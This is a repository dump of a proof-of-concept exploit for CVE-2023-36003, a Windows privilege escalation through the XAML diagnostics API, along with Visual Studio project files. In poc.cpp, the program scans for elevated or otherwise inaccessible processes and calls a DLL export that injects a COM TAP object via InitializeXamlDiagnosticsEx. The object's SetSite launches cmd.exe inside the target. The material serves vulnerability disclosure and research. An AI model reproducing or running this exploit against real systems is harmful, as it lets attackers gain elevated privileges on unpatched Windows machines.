├── pe-poc-dll ├── exports.def ├── pe-poc-dll.vcxproj.filters ├── poc.cpp └── pe-poc-dll.vcxproj ├── README.md ├── pe-poc ├── pe-poc.vcxproj.filters ├── poc.cpp └── pe-poc.vcxproj ├── pe-poc.sln ├── .gitattributes └── .gitignore /pe-poc-dll/exports.def: -------------------------------------------------------------------------------- 1 | LIBRARY "pe-poc-dll.dll" 2 | EXPORTS 3 | InjectTAP 4 | DllGetClassObject PRIVATE 5 | DllCanUnloadNow PRIVATE 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Privilege escalation using the XAML diagnostics API (CVE-2023-36003) 2 | 3 | This is a POC (Proof of Concept) of a privilege escalation vulnerability using 4 | the XAML diagnostics API. The vulnerability was patched in December's Patch 5 | Tuesday, and the CVE assigned to it is 6 | [CVE-2023-36003](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36003). 7 | 8 | ## Usage 9 | 10 | The POC is a C++ project that can be compiled using Visual Studio. After 11 | compiling, the POC can be run without arguments to look for an inaccessible 12 | process and then run the exploit against it. Alternatively, a process id can be 13 | passed as an argument, and the exploit will be run against that process. 14 | 15 | ## Vulnerability details 16 | 17 | More details about the vulnerability can be found in the following blog post: 18 | 19 | [Privilege escalation using the XAML diagnostics API 20 | (CVE-2023-36003)](https://m417z.com/Privilege-escalation-using-the-XAML-diagnostics-API-CVE-2023-36003/) 21 | -------------------------------------------------------------------------------- /pe-poc/pe-poc.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /pe-poc-dll/pe-poc-dll.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /pe-poc.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.6.33829.357 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "pe-poc", "pe-poc\pe-poc.vcxproj", "{BBF50E9A-D3A6-44EE-8A7A-1D021DA08D46}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "pe-poc-dll", "pe-poc-dll\pe-poc-dll.vcxproj", "{E7394B95-86D0-4B06-8DD9-1E62F7406F3B}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {BBF50E9A-D3A6-44EE-8A7A-1D021DA08D46}.Debug|x64.ActiveCfg = Debug|x64 19 | {BBF50E9A-D3A6-44EE-8A7A-1D021DA08D46}.Debug|x64.Build.0 = Debug|x64 20 | {BBF50E9A-D3A6-44EE-8A7A-1D021DA08D46}.Debug|x86.ActiveCfg = Debug|Win32 21 | {BBF50E9A-D3A6-44EE-8A7A-1D021DA08D46}.Debug|x86.Build.0 = Debug|Win32 22 | {BBF50E9A-D3A6-44EE-8A7A-1D021DA08D46}.Release|x64.ActiveCfg = Release|x64 23 | {BBF50E9A-D3A6-44EE-8A7A-1D021DA08D46}.Release|x64.Build.0 = Release|x64 24 | {BBF50E9A-D3A6-44EE-8A7A-1D021DA08D46}.Release|x86.ActiveCfg = Release|Win32 25 | {BBF50E9A-D3A6-44EE-8A7A-1D021DA08D46}.Release|x86.Build.0 = Release|Win32 26 | {E7394B95-86D0-4B06-8DD9-1E62F7406F3B}.Debug|x64.ActiveCfg = Debug|x64 27 | {E7394B95-86D0-4B06-8DD9-1E62F7406F3B}.Debug|x64.Build.0 = Debug|x64 28 | {E7394B95-86D0-4B06-8DD9-1E62F7406F3B}.Debug|x86.ActiveCfg = Debug|Win32 29 | {E7394B95-86D0-4B06-8DD9-1E62F7406F3B}.Debug|x86.Build.0 = Debug|Win32 30 | {E7394B95-86D0-4B06-8DD9-1E62F7406F3B}.Release|x64.ActiveCfg = Release|x64 31 | {E7394B95-86D0-4B06-8DD9-1E62F7406F3B}.Release|x64.Build.0 = Release|x64 32 | {E7394B95-86D0-4B06-8DD9-1E62F7406F3B}.Release|x86.ActiveCfg = Release|Win32 33 | {E7394B95-86D0-4B06-8DD9-1E62F7406F3B}.Release|x86.Build.0 = Release|Win32 34 | EndGlobalSection 35 | GlobalSection(SolutionProperties) = preSolution 36 | HideSolutionNode = FALSE 37 | EndGlobalSection 38 | GlobalSection(ExtensibilityGlobals) = postSolution 39 | SolutionGuid = {D54B67A3-321A-4466-B6D2-323D9A680B09} 40 | EndGlobalSection 41 | EndGlobal 42 | -------------------------------------------------------------------------------- /pe-poc/poc.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | bool RunPOC(DWORD pid, PCWSTR endpointName) { 8 | WCHAR path[MAX_PATH]; 9 | switch (GetModuleFileName(nullptr, path, ARRAYSIZE(path))) { 10 | case 0: 11 | case ARRAYSIZE(path): 12 | std::cout << "Failed to get module file name\n"; 13 | return false; 14 | } 15 | 16 | PWSTR filename = PathFindFileName(path); 17 | 18 | wcscpy_s(filename, ARRAYSIZE(path) - (filename - path), L"pe-poc-dll.dll"); 19 | 20 | HMODULE lib = LoadLibrary(path); 21 | if (!lib) { 22 | std::cout << "Failed to load pe-poc-dll.dll\n"; 23 | return false; 24 | } 25 | 26 | using inject_tap_proc_t = HRESULT(WINAPI*)(DWORD pid, PCWSTR endpointName); 27 | 28 | inject_tap_proc_t inject_tap_proc = (inject_tap_proc_t)GetProcAddress(lib, "InjectTAP"); 29 | if (!inject_tap_proc) { 30 | std::cout << "Failed to get InjectTAP proc address\n"; 31 | return false; 32 | } 33 | 34 | HRESULT hr = inject_tap_proc(pid, endpointName); 35 | 36 | // E_ELEMENT_NOT_FOUND 37 | if (hr == 0x80070490) { 38 | return false; 39 | } 40 | 41 | if (FAILED(hr)) { 42 | std::cout << "InjectTAP failed: " << hr << "\n"; 43 | return false; 44 | } 45 | 46 | return true; 47 | } 48 | 49 | int wmain(int argc, WCHAR** argv) { 50 | std::cout << "CVE-2023-36003 privilege escalation POC using XAML diagnostics API\n"; 51 | 52 | if (argc >= 2) { 53 | int pid = _wtoi(argv[1]); 54 | if (RunPOC(pid, argc >= 3 ? argv[2] : L"VisualDiagConnection1")) { 55 | std::cout << "Done, targeted PID " << pid << "\n"; 56 | } 57 | else { 58 | std::cout << "Failed to target PID " << pid << "\n"; 59 | } 60 | return 0; 61 | } 62 | 63 | std::cout << "Waiting for an elevated or otherwise inaccessible (e.g. UIAccess) process...\n"; 64 | 65 | bool done = false; 66 | while (!done) { 67 | Sleep(1000); 68 | 69 | PROCESSENTRY32 entry{ 70 | .dwSize = sizeof(PROCESSENTRY32), 71 | }; 72 | 73 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 74 | if (snapshot) { 75 | if (Process32First(snapshot, &entry)) { 76 | do { 77 | // Skip accessible processes. 78 | HANDLE process = OpenProcess(PROCESS_VM_WRITE, FALSE, entry.th32ProcessID); 79 | if (process) { 80 | CloseHandle(process); 81 | continue; 82 | } 83 | 84 | if (RunPOC(entry.th32ProcessID, L"VisualDiagConnection1")) { 85 | std::cout << "Done, targeted PID " << entry.th32ProcessID << "\n"; 86 | done = true; 87 | break; 88 | } 89 | } while (Process32Next(snapshot, &entry)); 90 | } 91 | 92 | CloseHandle(snapshot); 93 | } 94 | } 95 | } 96 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /pe-poc-dll/poc.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #pragma region tap_hpp 8 | 9 | #include 10 | 11 | // {AB61735B-2C1C-49CA-83D0-4BDBEA724B9D} 12 | static constexpr CLSID CLSID_ProofOfConceptTAP = { 0xab61735b, 0x2c1c, 0x49ca, { 0x83, 0xd0, 0x4b, 0xdb, 0xea, 0x72, 0x4b, 0x9d } }; 13 | 14 | struct ProofOfConceptTAP : winrt::implements 15 | { 16 | HRESULT STDMETHODCALLTYPE SetSite(IUnknown* pUnkSite) override; 17 | HRESULT STDMETHODCALLTYPE GetSite(REFIID riid, void** ppvSite) noexcept override; 18 | 19 | private: 20 | template 21 | static winrt::com_ptr FromIUnknown(IUnknown* pSite) 22 | { 23 | winrt::com_ptr site; 24 | site.copy_from(pSite); 25 | 26 | return site.as(); 27 | } 28 | 29 | winrt::com_ptr visualTreeService; 30 | }; 31 | 32 | #pragma endregion // tap_hpp 33 | 34 | #pragma region tap_cpp 35 | 36 | HRESULT ProofOfConceptTAP::SetSite(IUnknown* pUnkSite) try 37 | { 38 | visualTreeService = FromIUnknown(pUnkSite); 39 | 40 | WinExec("cmd.exe", SW_SHOWDEFAULT); 41 | 42 | return S_OK; 43 | } 44 | catch (...) 45 | { 46 | return winrt::to_hresult(); 47 | } 48 | 49 | HRESULT ProofOfConceptTAP::GetSite(REFIID riid, void** ppvSite) noexcept 50 | { 51 | return visualTreeService.as(riid, ppvSite); 52 | } 53 | 54 | #pragma endregion // tap_cpp 55 | 56 | #pragma region simplefactory_hpp 57 | 58 | #include 59 | 60 | template 61 | struct SimpleFactory : winrt::implements, IClassFactory, winrt::non_agile> 62 | { 63 | HRESULT STDMETHODCALLTYPE CreateInstance(IUnknown* pUnkOuter, REFIID riid, void** ppvObject) override try 64 | { 65 | if (!pUnkOuter) 66 | { 67 | *ppvObject = nullptr; 68 | return winrt::make().as(riid, ppvObject); 69 | } 70 | else 71 | { 72 | return CLASS_E_NOAGGREGATION; 73 | } 74 | } 75 | catch (...) 76 | { 77 | return winrt::to_hresult(); 78 | } 79 | 80 | HRESULT STDMETHODCALLTYPE LockServer(BOOL) noexcept override 81 | { 82 | return S_OK; 83 | } 84 | }; 85 | 86 | #pragma endregion // simplefactory_hpp 87 | 88 | #pragma region module_cpp 89 | 90 | #include 91 | 92 | _Use_decl_annotations_ STDAPI DllGetClassObject(REFCLSID rclsid, REFIID riid, LPVOID* ppv) try 93 | { 94 | if (rclsid == CLSID_ProofOfConceptTAP) 95 | { 96 | *ppv = nullptr; 97 | return winrt::make>().as(riid, ppv); 98 | } 99 | else 100 | { 101 | return CLASS_E_CLASSNOTAVAILABLE; 102 | } 103 | } 104 | catch (...) 105 | { 106 | return winrt::to_hresult(); 107 | } 108 | 109 | _Use_decl_annotations_ STDAPI DllCanUnloadNow(void) 110 | { 111 | if (winrt::get_module_lock()) 112 | { 113 | return S_FALSE; 114 | } 115 | else 116 | { 117 | return S_OK; 118 | } 119 | } 120 | 121 | #pragma endregion // module_cpp 122 | 123 | using PFN_INITIALIZE_XAML_DIAGNOSTICS_EX = decltype(&InitializeXamlDiagnosticsEx); 124 | 125 | HMODULE GetCurrentModuleHandle() 126 | { 127 | HMODULE module; 128 | if (!GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS | 129 | GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, 130 | L"", &module)) 131 | { 132 | return nullptr; 133 | } 134 | 135 | return module; 136 | } 137 | 138 | HRESULT InjectTAP(DWORD pid, PCWSTR endpointName) noexcept 139 | { 140 | HMODULE module = GetCurrentModuleHandle(); 141 | if (!module) 142 | { 143 | return HRESULT_FROM_WIN32(GetLastError()); 144 | } 145 | 146 | WCHAR location[MAX_PATH]; 147 | switch (GetModuleFileName(module, location, ARRAYSIZE(location))) 148 | { 149 | case 0: 150 | case ARRAYSIZE(location): 151 | return HRESULT_FROM_WIN32(GetLastError()); 152 | } 153 | 154 | const HMODULE wux(LoadLibraryEx(L"Windows.UI.Xaml.dll", nullptr, LOAD_LIBRARY_SEARCH_SYSTEM32)); 155 | if (!wux) [[unlikely]] 156 | { 157 | return HRESULT_FROM_WIN32(GetLastError()); 158 | } 159 | 160 | const auto ixde = reinterpret_cast(GetProcAddress(wux, "InitializeXamlDiagnosticsEx")); 161 | if (!ixde) [[unlikely]] 162 | { 163 | return HRESULT_FROM_WIN32(GetLastError()); 164 | } 165 | 166 | const HRESULT hr2 = ixde(endpointName, pid, L"", location, CLSID_ProofOfConceptTAP, nullptr); 167 | if (FAILED(hr2)) [[unlikely]] 168 | { 169 | return hr2; 170 | } 171 | 172 | return S_OK; 173 | } 174 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | 4 | # User-specific files 5 | *.suo 6 | *.user 7 | *.userosscache 8 | *.sln.docstates 9 | 10 | # User-specific files (MonoDevelop/Xamarin Studio) 11 | *.userprefs 12 | 13 | # Build results 14 | [Dd]ebug/ 15 | [Dd]ebugPublic/ 16 | [Rr]elease/ 17 | [Rr]eleases/ 18 | [Xx]64/ 19 | [Xx]86/ 20 | [Bb]uild/ 21 | bld/ 22 | [Bb]in/ 23 | [Oo]bj/ 24 | 25 | # Visual Studio 2015 cache/options directory 26 | .vs/ 27 | # Uncomment if you have tasks that create the project's static files in wwwroot 28 | #wwwroot/ 29 | 30 | # MSTest test Results 31 | [Tt]est[Rr]esult*/ 32 | [Bb]uild[Ll]og.* 33 | 34 | # NUNIT 35 | *.VisualState.xml 36 | TestResult.xml 37 | 38 | # Build Results of an ATL Project 39 | [Dd]ebugPS/ 40 | [Rr]eleasePS/ 41 | dlldata.c 42 | 43 | # DNX 44 | project.lock.json 45 | artifacts/ 46 | 47 | *_i.c 48 | *_p.c 49 | *_i.h 50 | *.ilk 51 | *.meta 52 | *.obj 53 | *.pch 54 | *.pdb 55 | *.pgc 56 | *.pgd 57 | *.rsp 58 | *.sbr 59 | *.tlb 60 | *.tli 61 | *.tlh 62 | *.tmp 63 | *.tmp_proj 64 | *.log 65 | *.vspscc 66 | *.vssscc 67 | .builds 68 | *.pidb 69 | *.svclog 70 | *.scc 71 | 72 | # Chutzpah Test files 73 | _Chutzpah* 74 | 75 | # Visual C++ cache files 76 | ipch/ 77 | *.aps 78 | *.ncb 79 | *.opendb 80 | *.opensdf 81 | *.sdf 82 | *.cachefile 83 | *.VC.db 84 | 85 | # Visual Studio profiler 86 | *.psess 87 | *.vsp 88 | *.vspx 89 | *.sap 90 | 91 | # TFS 2012 Local Workspace 92 | $tf/ 93 | 94 | # Guidance Automation Toolkit 95 | *.gpState 96 | 97 | # ReSharper is a .NET coding add-in 98 | _ReSharper*/ 99 | *.[Rr]e[Ss]harper 100 | *.DotSettings.user 101 | 102 | # JustCode is a .NET coding add-in 103 | .JustCode 104 | 105 | # TeamCity is a build add-in 106 | _TeamCity* 107 | 108 | # DotCover is a Code Coverage Tool 109 | *.dotCover 110 | 111 | # NCrunch 112 | _NCrunch_* 113 | .*crunch*.local.xml 114 | nCrunchTemp_* 115 | 116 | # MightyMoose 117 | *.mm.* 118 | AutoTest.Net/ 119 | 120 | # Web workbench (sass) 121 | .sass-cache/ 122 | 123 | # Installshield output folder 124 | [Ee]xpress/ 125 | 126 | # DocProject is a documentation generator add-in 127 | DocProject/buildhelp/ 128 | DocProject/Help/*.HxT 129 | DocProject/Help/*.HxC 130 | DocProject/Help/*.hhc 131 | DocProject/Help/*.hhk 132 | DocProject/Help/*.hhp 133 | DocProject/Help/Html2 134 | DocProject/Help/html 135 | 136 | # Click-Once directory 137 | publish/ 138 | 139 | # Publish Web Output 140 | *.[Pp]ublish.xml 141 | *.azurePubxml 142 | 143 | # TODO: Un-comment the next line if you do not want to checkin 144 | # your web deploy settings because they may include unencrypted 145 | # passwords 146 | #*.pubxml 147 | *.publishproj 148 | 149 | # NuGet Packages 150 | *.nupkg 151 | # The packages folder can be ignored because of Package Restore 152 | **/packages/* 153 | # except build/, which is used as an MSBuild target. 154 | !**/packages/build/ 155 | # Uncomment if necessary however generally it will be regenerated when needed 156 | #!**/packages/repositories.config 157 | # NuGet v3's project.json files produces more ignoreable files 158 | *.nuget.props 159 | *.nuget.targets 160 | 161 | # Microsoft Azure Build Output 162 | csx/ 163 | *.build.csdef 164 | 165 | # Microsoft Azure Emulator 166 | ecf/ 167 | rcf/ 168 | 169 | # Windows Store app package directory 170 | AppPackages/ 171 | BundleArtifacts/ 172 | 173 | # Visual Studio cache files 174 | # files ending in .cache can be ignored 175 | *.[Cc]ache 176 | # but keep track of directories ending in .cache 177 | !*.[Cc]ache/ 178 | 179 | # Others 180 | ClientBin/ 181 | [Ss]tyle[Cc]op.* 182 | ~$* 183 | *~ 184 | *.dbmdl 185 | *.dbproj.schemaview 186 | *.pfx 187 | *.publishsettings 188 | node_modules/ 189 | orleans.codegen.cs 190 | 191 | # RIA/Silverlight projects 192 | Generated_Code/ 193 | 194 | # Backup & report files from converting an old project file 195 | # to a newer Visual Studio version. Backup files are not needed, 196 | # because we have git ;-) 197 | _UpgradeReport_Files/ 198 | Backup*/ 199 | UpgradeLog*.XML 200 | UpgradeLog*.htm 201 | 202 | # SQL Server files 203 | *.mdf 204 | *.ldf 205 | 206 | # Business Intelligence projects 207 | *.rdl.data 208 | *.bim.layout 209 | *.bim_*.settings 210 | 211 | # Microsoft Fakes 212 | FakesAssemblies/ 213 | 214 | # GhostDoc plugin setting file 215 | *.GhostDoc.xml 216 | 217 | # Node.js Tools for Visual Studio 218 | .ntvs_analysis.dat 219 | 220 | # Visual Studio 6 build log 221 | *.plg 222 | 223 | # Visual Studio 6 workspace options file 224 | *.opt 225 | 226 | # Visual Studio LightSwitch build output 227 | **/*.HTMLClient/GeneratedArtifacts 228 | **/*.DesktopClient/GeneratedArtifacts 229 | **/*.DesktopClient/ModelManifest.xml 230 | **/*.Server/GeneratedArtifacts 231 | **/*.Server/ModelManifest.xml 232 | _Pvt_Extensions 233 | 234 | # LightSwitch generated files 235 | GeneratedArtifacts/ 236 | ModelManifest.xml 237 | 238 | # Paket dependency manager 239 | .paket/paket.exe 240 | 241 | # FAKE - F# Make 242 | .fake/ 243 | -------------------------------------------------------------------------------- /pe-poc/pe-poc.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {bbf50e9a-d3a6-44ee-8a7a-1d021da08d46} 25 | pepoc 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | true 77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 78 | true 79 | stdcpp20 80 | MultiThreadedDebug 81 | 82 | 83 | Console 84 | true 85 | shlwapi.lib;%(AdditionalDependencies) 86 | 87 | 88 | 89 | 90 | Level3 91 | true 92 | true 93 | true 94 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 95 | true 96 | stdcpp20 97 | MultiThreaded 98 | 99 | 100 | Console 101 | true 102 | true 103 | false 104 | shlwapi.lib;%(AdditionalDependencies) 105 | 106 | 107 | 108 | 109 | Level3 110 | true 111 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 112 | true 113 | stdcpp20 114 | MultiThreadedDebug 115 | 116 | 117 | Console 118 | true 119 | shlwapi.lib;%(AdditionalDependencies) 120 | 121 | 122 | 123 | 124 | Level3 125 | true 126 | true 127 | true 128 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 129 | true 130 | stdcpp20 131 | MultiThreaded 132 | 133 | 134 | Console 135 | true 136 | true 137 | false 138 | shlwapi.lib;%(AdditionalDependencies) 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | -------------------------------------------------------------------------------- /pe-poc-dll/pe-poc-dll.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {e7394b95-86d0-4b06-8dd9-1e62f7406f3b} 25 | pepocdll 26 | 10.0 27 | 28 | 29 | 30 | DynamicLibrary 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | DynamicLibrary 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | DynamicLibrary 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | DynamicLibrary 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | true 77 | WIN32;_DEBUG;PEPOCDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 78 | true 79 | stdcpp20 80 | MultiThreadedDebug 81 | 82 | 83 | Windows 84 | true 85 | false 86 | exports.def 87 | 88 | 89 | 90 | 91 | Level3 92 | true 93 | true 94 | true 95 | WIN32;NDEBUG;PEPOCDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 96 | true 97 | stdcpp20 98 | MultiThreaded 99 | 100 | 101 | Windows 102 | true 103 | true 104 | false 105 | false 106 | exports.def 107 | 108 | 109 | 110 | 111 | Level3 112 | true 113 | _DEBUG;PEPOCDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 114 | true 115 | stdcpp20 116 | MultiThreadedDebug 117 | 118 | 119 | Windows 120 | true 121 | false 122 | exports.def 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;PEPOCDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 132 | true 133 | stdcpp20 134 | MultiThreaded 135 | 136 | 137 | Windows 138 | true 139 | true 140 | false 141 | false 142 | exports.def 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | --------------------------------------------------------------------------------